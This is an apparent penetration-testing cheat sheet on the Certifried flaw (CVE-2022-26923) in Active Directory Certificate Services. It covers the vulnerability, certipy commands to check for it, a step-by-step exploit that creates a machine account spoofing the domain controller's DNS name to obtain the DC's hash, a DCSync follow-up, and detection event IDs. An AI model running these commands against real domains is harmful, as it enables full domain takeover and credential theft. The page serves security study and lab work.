πΎ Overview
Certifried, or CVE-2022-26923 is a vulnerability in ADCS (Active Directory Certificate Services), that allows a user to impersonate a domain controller.
Due to an issue with how ADCS handles uniqueness with DNS hostnames, you can create a machine account with the same DNS hostname as the domain controller. The hostname is used for authentication when a machine authenticates with the Machine template, allowing impersonation. DNS hostnames are normally checked for uniqueness against the SPN (Service Principal Name), but clearing the SPN breaks this check.
π Discovery
Requirements:
- A user on the domain
- The ability to add a machine to the domain - Checking the MAQ
- An unpatched system (Certifried was patched in 2022)
Run the following check in certipy to see if the host is vulnerable:
certipy req -u "[USERNAME]@[DOMAIN]" -p "[PASSWORD]" -dc-ip "[IP]" -target "$ADCS_HOST" -ca 'ca_name' -template 'User'If the output isnβt Certificate object SID is [...], the host is vulnerable.
If you need the CA name for the above check, try the following:
certipy-ad find -dc-ip [IP] -dc-only -u "[USER]@[DOMAIN]" -p '[PASSWORD]'π Exploitation
If the check works and the host appears to be vulnerable, youβll need to create a new machine account impersonating the domain controller, and then authenticate to get its hash.
# make a machine account and impersonate the DC
certipy-ad account create -u "[USERNAME]@[DOMAIN]" -p '[PASSWORD]' -user "[MACHINE ACCOUNT NAME]" -pass 'Password123!' -dns "[DC DNS HOSTNAME]" -dc-ip [IP]
# Request a certificate for the newly created machine account
certipy-ad req -u '[MACHINE ACCOUNT NAME]$'@"[DOMAIN]" -p 'Password123!' -dc-ip [IP] -target "dc.certifried.htb" -ca 'certifried-DC-CA' -template 'Machine'
# Authenticate with the certificate to get the hash of the DC
certipy-ad auth -pfx ./dc.pfx -dc-ip 10.129.227.189 -domain 'certifried.htb'If you recieve the error
KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)when authenticating, try runninggpupdate /forceon the machine and trying again
β¨ Post-Exploitation
Use the obtained hash of the domain controller to perform a DCSync attack.
π Detection & Evasion
Event 4887: Certificate Services Approved A Certificate Request And Issued A Certificate will get generated when the certificate is issued, and event 4741(S): A computer account was created is generated when the machine account is added.
π Resources
| π Hyperlink | βΉοΈ Info |
|---|---|
| The Hacker Recipies | Certifried Writeup |
| Hack The Box | Certifried Writeup |
| Semperis | Certifried Writeup |